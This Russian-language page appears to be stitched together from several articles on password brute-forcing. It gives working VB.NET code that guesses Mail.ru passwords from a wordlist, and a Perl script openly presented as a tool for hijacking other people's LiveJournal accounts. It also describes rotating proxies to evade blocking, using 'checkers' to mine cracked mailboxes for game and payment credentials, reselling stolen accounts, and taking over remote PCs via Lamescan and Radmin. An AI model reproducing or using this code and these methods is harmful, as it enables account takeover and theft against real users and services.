Брутфорс перебор паролей. Что такое брут аккаунтов? Кому и зачем это нужно
Всем привет! Наконец-то я нашел время для написания большой статьи.
В ней я покажу, как писать BruteForce (разг. "брут").
1) Немного истории
Еще в начале года я начал искать информацию по написанию брутфорса в сети.
Ее было очень мало, пришлось даже кое-что переводить с испанского =)).
Но я не сдавался и продолжал поиски, и вот месяца два назад я во всем разобрался и написал простой однопоточный брутфорс. Но до "гигантов" типа "Brutus AET2" было далеко. Я стал искать информацию про многопоточность, и мои поиски увенчались успехом. Теперь все информация собрана и я пишу эту статью, чтобы тем кто решил написать брут не пришлось лазать по уголкам сети, собирая информацию.
2)Теория
В своем предыдущем рассказе, я не раз упомянул слово брутфорс. Что же это такое?
Покажу на примере: Допустим, вы забыли свой пароль не Email (кстати, это происходит довольно часто).
Можно попробовать восстановить пароль через контрольный вопрос или мобильный телефон, но если мобильного нет, а в контрольном вопросе написано - "Сколько зубов на правой лапе у моего кота?”.
Что тогда делать? Правильно, пытаться подобрать пароль. Но как??? Вручную?? Конечно же нет, для этого и создан брутфорс, чтобы делать перебор за вас.
Принцип работы простой: Указываем наш Email и подключаем список паролей. Жмем Start и идем заниматься своими делами. Когда будет подобран правильный пароль, брутфорс выведет его на экран.
Все бы хорошо, но если у нас в словаре миллион паролей? Брут отправит миллион запросов на сервер и сервер подумает, что мы пытаемся взломать чужой ящик, и просто заблокирует наш IP адрес. Как тогда быть?
Для этого предусмотрели прокси-сервера. Я не буду рассказывать, что это такое, так как это довольно обширная тема. Почитать про прокси можно . В двух словах: прокси поменяют наш IP и перебор продолжится.
Последний пункт теории - режимы перебора.
Их всего два: однопоточный и многопоточный.
В однопоточном режиме брутфорс берет первый пароль и ждет ответ от сервера. Когда ответ получен - берет следующий пароль и т.д.
В многопоточном режиме брутфорс создает множество потоков. В каждом из них происходит перебор, т. е. брутфорсу не нужно ждать ответа от сервера для продолжения. Он просто создает следующий поток и перебор продолжается.
Пример: Вы решили скачать фильм через торрент. Вы нашли торрент файл и поставили закачку. Пока идет закачка, вы, например, зашли в Контакт и переписываетесь с друзьями. В одном потоке работает браузер, а в другом торрент усердно качает фильм, а в третьем антивирус выполняет сканирование системы и т.д
Надеюсь, понятно объяснил.
2)Долгожданная практика
Пока мы напишем простой однопоточный брут (чтобы мозги не перегружать), а во второй части стать, я расскажу о создании многопоточного перебора и смене
прокси + приведу свои части кода, которые вы можете использовать в своих проектах.
Итак! Поехали.
Открываем VB.NET, создаем обычный проект и делаем примерно такой дизайн:
Теперь надо определиться с сервером и "отснифать" запросы.
Я покажу на примере Маил.ру:
С помощью нее мы посмотрим, как происходит авторизация на сервере.
2) Запускаем Stand-Alone версию программы:3
3) Идем на Маил.ру почту и вводим данные, но пока не входим:
4) В HttpAnalyzer"е отщелкиваем паузу.
Возвращаемся в Маил Почту и жмем Войти.
Теперь обратно в сниффер. Наблюдаем следующее:
Синим цветом выделен POST запрос на скрипт авторизации.
Смотрим, какие данные отправляются:
Login - Логин
Domain - Домен
Password - Пароль
Saveauth - Надо ли сохранять наши данные (точно не уверен)
Про последний параметр ничего сказать не могу, но он нам и не нужем:н =)
Пробуем отправить запрос:
Если все введено правильно, то попадаем на свою почту.
Если нет, то увидим сообщение об ошибке входа.
Для этого идем на вкладку Cookies. Нас интересует правая часть:
Видим, что создаются две куки: Mpop и t.
"Set - Cookie" - поле заголовка отправляемого на сервер.
6) Теперь введем левые данные и проанализируем результат.
Видим, что кукисы не создаются.
Отлично! Теперь мы знаем как написать брутфорс:
Для начала объявим массив, в который поместим пароли из словаря:
Public PassList As New ArrayList
Код для кнопки "..." (три точки):
Dim f As New OpenFileDialog " Создаем новый диалог октрытия файла If f.ShowDialog = Windows.Forms.DialogResult.OK And f.FileName <> "" Then " Если пользователь выбрал список, то PassList.AddRange(IO.File.ReadAllLines(f.FileName)) " Считываем все пароли в массив txtPassList.Text=f.FileName " Выводим в текстбокс путь до файла End If
Теперь код для кнопки Начать перебор:
If txtLogin.Text <> "" Then " Если ввели логин то Dim i As Integer = 0 " Объявляем счетчик для перебора For i = 0 To PassList.Count - 1 " Перебираем, пока есть пароли System.Threading.Thread.Sleep(1000) Dim Request As Net.HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text, "@")(1) _ & "&Password=" & PassList(i)) " Формируем запрос Dim Response As Net.HttpWebResponse "Метод передачи данных: Request.Method = "POST" "Запрещаем атопереходы Request.AllowAutoRedirect = False "Отправляем запрос Response = Request.GetResponse "Проверяем куки If Response.Headers("Set-Cookie").IndexOf("Mpop") = 0 Then " Если кука Mpop есть, то MsgBox("Пароль подобран: " + PassList(i)) " Выводим парвильный пароль Exit Sub " Заканчиваем перебор End If Next End If
Если что-то непонятно - напишите мне. Свои контакты оставлю ниже.
Делаем словарь паролей типа:
[тут правильный пароль]
234411dsdfd
Скопируйте и поменяйте красный текст на свой пароль.
Подключаем все к программе:
Жмем начать перебор.
Если увидите окошко Пароль подобран, значит все работает.
P.S Извините за опечатки.
P.P.S Если что-то не понятно, то пишите. Всегда рад помочь!
Комментарии ()
Кулхацкер
Я тебе по выделяю код!!! Ну что за народ блин?!
XeoNА чем его выделять??
КулхацкерИтак, перенесено в VB.NET. Вот блин все все для взлома пишут, так если бы просто писали, так еще и код норовят выделить!
Огромная просьба следующим поколениям: НЕ ВЫДЕЛЯЙТЕ КОД!!!
Артёмну ты капец мега мощь
исходинкХоть бы исходник выложил
Очень полезный урок:) У меня всё получилось на Visual Basic 2008, правда я немного подредактировал
Всем известно, как в последнее время стал
популярен ресурс livejournal.com или попросту ЖЖ.
Сделать аккаунт в этой системе далеко не
просто. Нужно либо заплатить за ключ, либо
попросить его у знакомых ЖЖистов.
Существует известная пословица: чем
просить и унижаться, лучше <вырезано
цензурой> и молчать:). Поэтому, сегодня мы
будем писать брутфорс, который с легкой
руки поломает ЖЖ какого-нибудь американца
лабуха:). Разумеется, ты должен выбирать
жертву, которая кинула пару сообщений после
регистрации, а потом как в воду канула, то
есть попросту забила на livejournal. Таких
аккаунтов полно и их можно узнать без
проблем.
Итак, вернемся к нашей задумке. Вначале нам
нужно узнать, как осуществляется логин в
систему. Зайдя на www.livejournal.com/login.bml мы увидим
в правом верхнем углу маленькую форму для
логина. Нет, я сужу не про большую в середине
экрана. После просмотра html-кода я выбрал
маленькую. Дело в том, что в этой форме всего
два параметра, в отличии от полноценной. Наш
будущий брутфорс должен передавать минимум
данных для высокого КПД, поэтому
остановимся на этой формочке.
Форма имеет два параметра: user и password. Сам
скрипт может получить необязательный
параметр mode, значение которого равно "login".
Видимо, при передаче user и password система
подразумевает авторизацию. Нетерпеливо
вбив в броузере ссылку http://www.livejournal.com/login.bml?user=fuck&password=fucked
(естественно, все имена изменены в целях
конспирации:)), я получил от ворот поворот.
Система была рассчитана только на POST-метод.
Но я человек упорный и не устоял даже перед
этой защитой:].
Следующим шагом было восстановления памяти
на предмет работы POST-метода. Для него
актуальна передача следующих обязательных
параметров на сервер:
POST
Host
Content-Length
собственно пост 🙂
Примерно набросав в текстовике запрос на
сервер, я получил следующее:
POST /login.bml HTTP/1.1
Host: www.livejournal.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=fuck&password=fucked
Как ни странно, оно не работало:). Система
ругалась на неверный пароль. Я подумал, мол
существует проверка на Referer и UserAgent, но ошибся.
При подстановке поддельных параметров
сервер также выдавал ответ - Password Incorrect. Как
оказалось, если поставить после пароля
символ & и увеличить длину строки на
единичку, то сервер успешно кушал данные и
возвращал Loginned.
Мне очень не хотелось выкачивать всю
длинную ХТМЛину и вырезать из нее строку
Loginned. Я хотел ограничиться скромным recv на
один килобайт данных:). Это было возможным,
так как сервер проставлял кукизы в header-строках.
В этих куках при удачном ответе содержалось
имя пользователя и зашифрованный пароль,
примерно в таком формате:
Set-Cookie: ljsession=ws:fuck:1:fDjwfWdsC; path=/; HttpOnly
Ничто не мешало проверить, есть ли в header"е
имя пользователя и если есть - прекращать
брутфорсинг и писать в лог аккаунт.
В теории брутфорс был написан. Осталось
реализовать это дело на практике. Я
использовал Perl для кодинга, ибо знаю этот
язык уже третий год и он идеально подходил
для моих задумок. Поискав у себя на винте
шаблон брута, я нашел MIME-брутфорс для httpd-аккаунтов,
который как-то описывал на этом сайте:).
Немного изменив его, я получил полноценный
ЖЖ-брутфорс. Единственным его минусом
является однопотоковость, но для такого
крутого кодера как ты, я считаю это не будет
большой проблемой:). Тебе остается
реализовать многопотоковость, либо
пользоваться моей демо-версией;).
Итак, собственно код:
#!/usr/bin/perl
use IO::Socket; ##
Юзаем сокеты
$|++; ##
Инкременируем
буферайз
$server="www.livejournal.com"; ##
Задаем
сервер
$port="80"; ##
А также
порт 🙂
$logfile="cracked.log"; ##
Сюда
пишем взломанный аккаунт
$words="bigdict.txt"; ##
Наш
большой словарик, по которому ведется
брутфорс
$user="fuck"; ##
Юзер,
которого ломаем
$dir="/login.bml"; ##
Скрипт,
который возвращает статус
open(file, "$words") or die print "$!\n";
@data=
$total=@data;
close file; ##
словарь, запишем все слова в массив
foreach $pass (@data) { ##
Цикл по
каждому слову
$i++;
chomp($pass);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => tcp)
or die print "Unable to connect to $server:$port\n"; ##
Создаем соединение с livejournal.com
$socket->autoflush(1); ##
Отрубаем буферизацию (на всякий случай, т.к.
по дефолту она вырублена)
$post="user=$user&password=$pass&"; ##
Формируем POST-запрос
$len=length($post);
$len+=1; ##
Находим длину
запроса (фраза + \r\n)
print $socket "POST $dir HTTP/1.1\r\n";
print $socket "Host: www.livejournal.com\r\n";;
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "Connection: Close\r\n";
print $socket "Content-Length: $len\r\n";
print $socket "\r\n$post\r\n";
## Отправим в сокет
длинный header
$socket->recv($answer,1024); ## И
прочитаем возврат = 1 кб данных
if ($answer=~/\:$user\:/) {
open(logf, ">>$logfile") or die print "$!\n";
print logf "$user:$pass is OK!!!\n";
close logf;
print "$user:$pass is OK!!!\n";
exit 0; ## Если он содержит
строку вида:user: - пишем лог и завершаем брут.
} ##
Иначе, проверяем
следующий пароль
}
Вот собственно и весь брутфорс. Проверен
лично мной - работает на ура:). Но аккаунтов
для проверки я тебе не дам - я жадный;), тести
на своих. Как видишь все просто осуществить,
если только захотеть.
В играх, соцсетях и т.п., которые были добыты незаконным путём, то есть взломаны или украдены. Безусловно, что такое брут, как он работает, понять довольно сложно, но мы с вами попытаемся это сделать. Но для начала давайте разберёмся с тем, как не стать очередной жертвой злоумышленников.
Что такое брут, и как от него защититься
Итак, существует специальный софт, позволяющий методом подбора комбинаций из цифр и букв находить правильные пароли к существующим логинам, майлам и т. д. Конечно, в работе таких программ есть ряд особенностей. Например, чем длиннее и сложнее пароль, тем дольше он будет подбираться, всё может дойти до того, что брут будет провален. Что касается времени, то многое зависит от вычислительной мощности техники, интернет-соединения. Так, процесс может продолжаться от нескольких минут и затягиваться до суток и более.
Вы уже наверняка успели понять, что такое брут аккаунтов. Что касается защиты, то, как было замечено выше, желательно ставить такой пароль, который сложно запомнить самому. Например, RKGJH4hKn2. Можно с уверенностью сказать, что взломать его будет довольно проблематично. Помимо этого нужно помнить, что, к примеру, много одинаковых букв не дают никакого эффекта, точно так же, как и цифр. Всё должно быть запутано и перемешано, желательно чередовать заглавные и прописные буквы.
Что такое база для брута
Безусловно, программа не будет работать, если нет данных. Так, если ей не из чего подбирать пароли, то делать этого она не будет. База - это набор паролей и логинов. Чем обширней этот список, тем больше шансов того, что аккаунт будет взломан. Многое зависит и от того, какие комбинации в ней присутствуют, то есть чем грамотней она составлена, тем лучше. Стоит также отметить, что база включает в себя не только пароли, но и логины, так как брутфорс, что в переводе с английского означает «грубая сила», может одновременно подбирать и то и другое.
Стоит заметить, что сам файл, в котором хранятся все записи, достаточно большой. Минимальная длина комбинации - 3 буквы и цифры, максимальная - 8-16 в зависимости от программы и её версии. Подбор начинается с буквы «А» и заканчивается последней литерой английского или русского алфавитов. Вот по сути вся информация по базам, которая может быть вам полезна.
Кому и зачем это нужно?
На данный вопрос однозначно ответить сложно. Люди по многим причинам пытаются взламывать аккаунты. Это может быть просто забава, желание прочитать чужие письма, отправлять недействительные сообщения и т. п. Всё дело в том, что это незаконно. Помимо можно считать самым настоящим воровством, а за это нужно отвечать. Настоятельно не рекомендуется заниматься такими делами, тем более что иногда это пустая трата времени.
Даже если аккаунт взломан, то его просто и быстро можно восстановить. Особенно просто это сделать, если вы при регистрации указывали реальные данные. Что же касается учёток, созданных на скорую руку, то вернуть их обратно будет гораздо сложнее. Но, как показывает практика, хакерами такие аккаунты не ценятся. Нет смысла забирать у кого-либо учётную запись или почту, которая не имеет ничего полезного, и об этом не нужно лишний раз говорить.
Кто занимается брутфорсом?
Не будет лишним сказать, что это делают так называемые хакеры. Это что касается масштабных взломов. По большому счёту, такие люди на этом зарабатывают себе на пропитание и делают это весьма умело. А работает схема следующим образом. При помощи брута подбираются логины и пароли (определённое количество), а затем оптом всё это дело продаётся заказчикам. То есть сами хакеры практически не используют то, что получили незаконно, а просто-напросто продают это. Но кто же покупатель, спросите вы?
Это может быть кто угодно. Единственное, что можно сказать, так это то, что они занимаются покупками большого количества учётных записей. Далее эти аккаунты продаются обычным пользователям, которые потом удивляются, что он вернулся своему прежнему владельцу. Это же касается и личных данных платёжных систем (Webmoney, Qiwi). Помимо того что есть вероятность заполучить определённое количество средств, такой аккаунт можно продать, особенно это актуально в тех случаях, когда имеются дорогостоящие сертификаты, подтверждающие компетентность владельца.
Немного о прокси серверах для брутфорса
Любой уважающий себя хакер прежде всего думает о том, как защитить себя. А так как то, что он делает, совершенно незаконно, то этому нужно уделить особое внимание. Мы уже знаем, что такое брут, а теперь хотелось бы сказать, как работает прокси-сервер. Он позволят оставаться незамеченным во время взлома учётных записей. Простыми словами, IP-адрес остаётся неизвестным. Это и есть основная защита людей, взламывающих чужие аккаунты.
Но это еще далеко не всё. После того как учётная запись была взломана, на неё нужно зайти. Но даже имея правильный логин и пароль, иногда сделать это непросто. Например, изменение IP-адреса влечёт отправку защитного кода на почту или телефон, такая система успешно используется компанией Valve, в частности для защиты их продукта под названием Steam. Конечно, уже стало понятно, для брута. Следовательно, мы можем войти в любой аккаунт и не вызвать совершенно никаких подозрений, что и делает преступление идеальным.
Не стоит лишний раз повторять, что пароль должен быть длинным и сложным. Также не рекомендуется пользоваться своей учётной записью в людных местах или на работе, где компьютером или ноутбуком может воспользоваться кто угодно. Во-первых, может быть использована специальная программа-шпион, которая запоминает, какие клавиши нажимались, как вы понимаете, вычислить пароль будет несложно.
Но это далеко не всё, о чём нужно знать. Желательно не запоминать пароль в браузере, так как он может быть перехвачен. Существуют аккаунты, где при входе сразу же приходит sms с подтверждающим кодом на мобильный телефон. Следовательно, если она пришла, а вы тут ни при чём, то изменяйте пароль, и желательно действовать как можно быстрее.
Чем отличается брут от чекера?
Итак, давайте теперь разберёмся, в чём же разница между этими двумя понятиями. Так, мы уже определились, что брутфорс позволяет подобрать логин и пароль путём простого перебора из словаря (базы). Рассмотрим пример на взломе почтовой службы. Например, мы получили доступ, а что делать дальше? Как правило, интересует информация об аккаунтах в соцсетях, онлайн играх, платёжных системах и т. п. Так вот, чекер сверяет пароль от почты, который у нас уже есть, на совпадения.
Простыми словами, если он совпадает, например, с тем, который установлен «Вконтакте», то мы это тут же узнаем. Можно сделать вывод, что это лишит нас лишней головной боли. Следовательно, процесс более автоматизирован и практически не требует нашего участия. Теперь вы знаете, что такое брут и чекер, и как работают эти программы.
Заключение
Исходя из всего вышесказанного, можно сделать определённые выводы. Учётную запись нужно использовать только на персональном компьютере, когда доступ посторонних людей исключён. Это же касается и подключений к бесплатным Wi-Fi, так как существует вероятность перехвата потока данных и последующей кражи вашего аккаунта. Так как вы уже знаете, брут, то и защититься вам будет гораздо проще. Как говорится, кто осведомлён, тот вооружен. Запомните, что то, насколько хорошо защищена ваша учётка, зависит только от вас. Если вы всё сделали правильно, то не нужно лишний раз беспокоиться, и вряд ли вам нужно будет знать, что такое брут аккаунта, и нюансы работы программы.
Брутфорс (происходит от английского словосочетания: brute force) — разновидность хакерской атаки — способ взлома учётных записей в компьютерных системах, платёжных/банковских сервисах и на веб-сайтах посредством автоматизированного подбора комбинаций паролей и логинов.
Брутфорс базируется на одноимённом математическом методе (brute force), в котором правильное решение — конечное число или символьная комбинация находится посредством перебора различных вариантов. Фактически каждое значение из заданного множества потенциальных ответов (решений) проверяется на правильность.
Принцип действия брутфорса
Хакер пишет специальную программу для подбора паролей либо использует уже готовое решение своих коллег. Она может быть ориентирована на определённый почтовый сервис, сайт, соцсеть (т.е. предназначена для взлома конкретного ресурса). Далее выполняется подготовка к взлому. Она состоит из следующих этапов:
- Составление прокси-листа
В целях скрытия истинного IP-адреса компьютера, с которого будет осуществляться атака, и для предотвращения блокировки со стороны сайта, где необходимо взломать учётную запись, выполняется настройка интернет-соединения через прокси-сервер.
Поиск адресов/портов прокси осуществляется в прокси-граббере (Proxy Grabber). Эта утилита самостоятельно извлекает все данные для подключения к серверам-посредникам из сайтов, предоставляющих прокси (они задаются в списке). Другими словами, выполняется сбор прокси.
Полученная база сохраняется в отдельный текстовый файл. А затем все адреса серверов, имеющиеся в ней, проверяются на работоспособность в прокси-чекере. Довольно часто программы, предназначенные для автоматизированной добычи прокси, совмещают в себе функции и граббера, и чекера.
В итоге, получается готовый прокси лист в виде списка IP/порт, сохранённый в файле txt. (Он понадобится при настройке программы брутфорс).
- Поиск баз для брута
К брутфорсу необходимо подключить словарь — некое множество комбинаций паролей и логинов — которые он будет подставлять в форму для входа. Он также, как и прокси-лист, имеет вид списка в обычном текстовом файле (.txt). Словари, они же базы, распространяются через хакерские форумы, сайты и файлообменники. Более опытные «умельцы» создают их самостоятельно и предоставляют всем желающим за определённую плату. Чем больше база (количество комбинаций, логинов, аккаунтов), тем лучше (для хакера) — тем больше вероятность успеха взлома.
- Настройка брутфорса
Загружается прокси лист; программа подбора автоматически будет менять прокси, чтобы веб-сервер не обнаружил атаку и, соответственно, источник (узел) атаки.
Подключается словарь из комбинаций пароль/логин. Устанавливается количество потоков — сколько одновременно комбинаций брутфорс будет проверять. Мощный компьютер с высокой скоростью интернета уверено справляется с 120-200 потоками (это оптимальное значение). От этой настройки напрямую зависит скорость брута. К примеру, если выставить всего 10 потоков, подбор будет выполняться очень медленно.
- Запуск брутфорса
Успешные попытки взлома программа фиксирует: сохраняет сбрученные аккаунты (пароль/логин) в файл. Длительность процедуры подбора колеблется от нескольких часов до нескольких дней. При этом она не всегда оказывается результативной — по причине высокой криптоустойчивости данных для входа либо осуществления других защитных мер со стороны атакуемого.
Виды брутфорса
Персональный взлом
Охота за конкретным аккаунтом — в соцсети, на почтовом сервисе и т.д. Посредством либо в процессе виртуального общения злоумышленник выпытывает у жертвы логин для доступа на какой-либо сайт. Затем взламывает пароль методом подбора: указывает в брутфорс адрес веб-ресурса и добытый логин, подключает словарь.
Шансы такого взлома невелики, например, по сравнению с той же XSS-атакой. Он может увенчаться успехом, если владелец аккаунта использовал пароль из 6-7 символов с незатейливой символьной комбинацией. В противном случае на «разгадывание» более устойчивых вариантов из 12,15, 20 букв, цифр и спецсимволов понадобятся годы — десятки и сотни лет, исходя из расчётов математической формулы поиска.
Брут/чек
К брутфорсу подключается база данных с логинами/паролями от почтовых ящиков одного почтового сервиса (например, mail.ru) либо разных. И прокси лист — для маскировки узла (так как по множественным запросам с одного IP-адреса веб-сервисы электронной почты довольно быстро детектируют атаку).
В опциях брута указывается список ключевых слов (как правило, названия сайтов) — ориентиры по которым он будет искать на взломанных ящиках в письмах данные для входа (например: steampowered, worldoftanks, 4game, VK). Либо конкретный интернет-ресурс.
Пользователь, регистрируясь в онлайн-игре, соцсети или на форуме, как и полагается, указывает свой мэйл (почтовый ящик). Веб-сервис присылает сообщение на указанный адрес с данными для входа и ссылкой на подтверждения регистрации. Именно эти письма и ищет брутфорс, что выудить из них логины и пароли.
Нажимаете «СТАРТ» и программа-взломщик начинает брут. Она действует по следующему алгоритму:
- Загружает из базы логин/пароль к мэйлу.
- Проверяет доступ, или «чекает», (автоматически авторизуется): если удаётся в аккаунт зайти — плюсует в графе good (гуды) единицу (значит найден ещё один рабочий мэйл) и начинает его просматривать (см. следующие пункты); если доступа нет — заносит его в bad (бэды).
- Во всех «гудах» (открытых мэйлах) брутфорс сканирует письма по заданному хакером запросу — то есть ищет логины/пароли к указанным сайтам и платёжным системам.
- При обнаружении искомых данных — копирует их и заносит в отдельный файл.
Таким образом, совершается массовый «угон» аккаунтов — от десятков до сотен. Добытыми «трофеями» злоумышленник распоряжается уже по своему усмотрению — продажа, обмен, сбор данных, кража денег.
Удаленный взлом компьютера
Брутфорс в совокупности с другими хакерскими утилитами используется для получения удаленного доступа к запароленному ПК жертвы через интернет-канал.
Данный вид атаки состоит из следующих этапов:
- Выполняется поиск IP-сетей, в которых будет проводиться атака на компьютеры пользователей. Диапазоны адресов берутся из специальных баз либо посредством специальных программ, например таких, как IP Geo. В ней можно выбирать IP-сети по конкретному округу, региону и даже городу.
- Отобранные диапазоны IP и словари подбора устанавливаются в настройках брутфорса Lamescan (или его аналога), предназначенного для удалённого брута логина/пароля входа в систему. После запуска Lamescan делает следующее:
- выполняет коннект на каждый IP из заданного диапазона;
- после установления связи пытается подключиться к хосту (ПК) через порт 4899 (но могут быть и другие варианты);
- если порт открыт: пытается получить доступ к системе, при запросе пароля выполняет подбор; в случае успеха — сохраняет в своей базе IP-адрес хоста (компьютера) и данные для входа.
- Хакер запускает утилиту Radmin, предназначенную для управления удалёнными ПК. Задаёт сетевые координаты жертвы (IP, логин и пароль) и получает полный контроль над системой — рабочий стол (отображается визуально на дисплее компьютера взломщика), файловые директории, настройки.
Программы для брута
Классический брутфорс, один из самых первых. Тем не менее, не теряет своей актуальности и конкурирует с новыми решениями. Имеет шустрый алгоритм перебора и поддерживает все основные интернет-протоколы — TCP/IP, POP3, HTTP и др. Умеет подделывать куки. Брутит по словарю и генерирует пароли самостоятельно.
Мощный брут- чекер. Оснащён расширенным арсеналом функций по работе с базами (проверка, сортировка по доменам). Поддерживает различные типы прокси, проверяет их работоспособность. Выполняет сканирование писем в ящиках по таким настройкам, как дата, ключевое слово, адрес, непрочитанные сообщения. Может скачивать письма с Mail.ru и Yandex.
Appnimi Password Unlocker
Программа для подбора брутфорсом пароля к файлу на локальном компьютере. Этакая рабочая лошадка. Бесплатный вариант программы позволяет подбирать пароли не более 5 символов. О том как установить и пользоваться программой Appnimi Password Unlocker можно прочитать